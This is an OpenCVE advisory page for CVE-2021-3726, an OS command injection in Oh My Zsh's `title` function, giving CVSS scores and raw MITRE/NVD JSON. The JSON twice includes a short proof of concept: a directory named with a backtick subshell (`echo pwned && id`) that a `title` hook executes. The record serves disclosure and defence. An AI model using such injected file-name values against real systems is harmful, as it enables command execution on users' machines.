CVE-2021-3726 - OpenCVE

# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function.

Attack Vector Network

Attack Complexity Low

Privileges Required None

Scope Unchanged

Confidentiality Impact High

Integrity Impact High

Availability Impact High

User Interaction None

No CVSS v3.0

Access Vector Network

Access Complexity Low

Authentication None

Confidentiality Impact Partial

Integrity Impact Partial

Availability Impact Partial

AV:N/AC:L/Au:N/C:P/I:P/A:P

Vendors & Products
CPE Configurations

Vendors	Products
Planetargon	Oh My Zsh

Configuration 1 [-]

cpe:2.3:a:planetargon:oh_my_zsh:*:*:*:*:*:*:*:*

References

Link	Resource
https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac	Patch Third Party Advisory

History

No history.

MITRE Information

Status: PUBLISHED

Assigner: @huntrdev

Published: 2021-11-30T09:30:15

Updated: 2021-11-30T09:30:15

Reserved: 2021-08-19T00:00:00

Link: CVE-2021-3726

JSON object: View

NVD Information

Status : Analyzed

Published: 2021-11-30T10:15:08.883

Modified: 2021-11-30T20:49:42.140

Link: CVE-2021-3726

JSON object: View

Redhat Information

No data.

CWE

CWE-78

{"containers": {"cna": {"affected": [{"product": "ohmyzsh/ohmyzsh", "vendor": "ohmyzsh", "versions": [{"lessThan": "a263cdac", "status": "affected", "version": "unspecified", "versionType": "custom"}]}], "descriptions": [{"lang": "en", "value": "# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function."}], "exploits": [{"lang": "en", "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Add a custom function that calls `title` to set the terminal title with a user-supplied string.\n For example:\n\n ```sh\n function dirpath_in_title {\n title \"$PWD\"\n }\n add-zsh-hook precmd dirpath_in_title\n ```\n\n3. Create and cd into a directory with a subshell command as its name:\n\n ```sh\n baddir='`echo pwned && id`'\n mkdir \"$baddir\" && cd \"$baddir\"\n ```\n\n4. The `title` function incorrectly expands the subshell command (see screenshot):\n\n ![2 title_function poc](https://user-images.githubusercontent.com/1441704/142874935-341ddd3c-21e8-4b9e-a5c1-77c0b3debacc.png)"}], "metrics": [{"cvssV3_1": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}}], "problemTypes": [{"descriptions": [{"cweId": "CWE-78", "description": "CWE-78 OS Command Injection", "lang": "en", "type": "CWE"}]}], "providerMetadata": {"dateUpdated": "2021-11-30T09:30:15", "orgId": "c09c270a-b464-47c1-9133-acb35b22c19a", "shortName": "@huntrdev"}, "references": [{"tags": ["x_refsource_MISC"], "url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"}], "title": "OS Command Injection in ohmyzsh/ohmyzsh", "x_legacyV4Record": {"CVE_data_meta": {"ASSIGNER": "security@huntr.dev", "ID": "CVE-2021-3726", "STATE": "PUBLIC", "TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"}, "affects": {"vendor": {"vendor_data": [{"product": {"product_data": [{"product_name": "ohmyzsh/ohmyzsh", "version": {"version_data": [{"version_affected": "<", "version_value": "a263cdac"}]}}]}, "vendor_name": "ohmyzsh"}]}}, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": {"description_data": [{"lang": "eng", "value": "# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function."}]}, "exploit": [{"lang": "en", "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Add a custom function that calls `title` to set the terminal title with a user-supplied string.\n For example:\n\n ```sh\n function dirpath_in_title {\n title \"$PWD\"\n }\n add-zsh-hook precmd dirpath_in_title\n ```\n\n3. Create and cd into a directory with a subshell command as its name:\n\n ```sh\n baddir='`echo pwned && id`'\n mkdir \"$baddir\" && cd \"$baddir\"\n ```\n\n4. The `title` function incorrectly expands the subshell command (see screenshot):\n\n ![2 title_function poc](https://user-images.githubusercontent.com/1441704/142874935-341ddd3c-21e8-4b9e-a5c1-77c0b3debacc.png)"}], "impact": {"cvss": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}}, "problemtype": {"problemtype_data": [{"description": [{"lang": "eng", "value": "CWE-78 OS Command Injection"}]}]}, "references": {"reference_data": [{"name": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac", "refsource": "MISC", "url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"}]}}}}, "cveMetadata": {"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a", "assignerShortName": "@huntrdev", "cveId": "CVE-2021-3726", "datePublished": "2021-11-30T09:30:15", "dateReserved": "2021-08-19T00:00:00", "dateUpdated": "2021-11-30T09:30:15", "state": "PUBLISHED"}, "dataType": "CVE_RECORD", "dataVersion": "5.0"}

{"configurations": [{"nodes": [{"cpeMatch": [{"criteria": "cpe:2.3:a:planetargon:oh_my_zsh:*:*:*:*:*:*:*:*", "matchCriteriaId": "80FD5E81-3E73-4921-925C-E55098EAE4B1", "versionEndExcluding": "2021-11-11", "vulnerable": true}], "negate": false, "operator": "OR"}]}], "descriptions": [{"lang": "en", "value": "# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function."}, {"lang": "es", "value": "# Vulnerabilidad en la funci\u00f3n \"title\" **Descripci\u00f3n**: la funci\u00f3n \"title\" definida en \"lib/termsupport.zsh\" usa \"print\" para establecer el t\u00edtulo de la terminal a una cadena proporcionada por el usuario. En Oh My Zsh, esta funci\u00f3n es siempre usada de forma segura, pero el c\u00f3digo de usuario personalizado podr\u00eda usar la funci\u00f3n \"title\" de forma no segura. **Corregido en**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **\u00c1reas afectadas**: - Funci\u00f3n \"title\" en \"lib/termsupport.zsh\". - C\u00f3digo de usuario personalizado usando la funci\u00f3n \"title\""}], "id": "CVE-2021-3726", "lastModified": "2021-11-30T20:49:42.140", "metrics": {"cvssMetricV2": [{"acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false}], "cvssMetricV31": [{"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary"}, {"cvssData": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.6, "impactScore": 5.9, "source": "security@huntr.dev", "type": "Secondary"}]}, "published": "2021-11-30T10:15:08.883", "references": [{"source": "security@huntr.dev", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"}], "sourceIdentifier": "security@huntr.dev", "vulnStatus": "Analyzed", "weaknesses": [{"description": [{"lang": "en", "value": "CWE-78"}], "source": "security@huntr.dev", "type": "Primary"}]}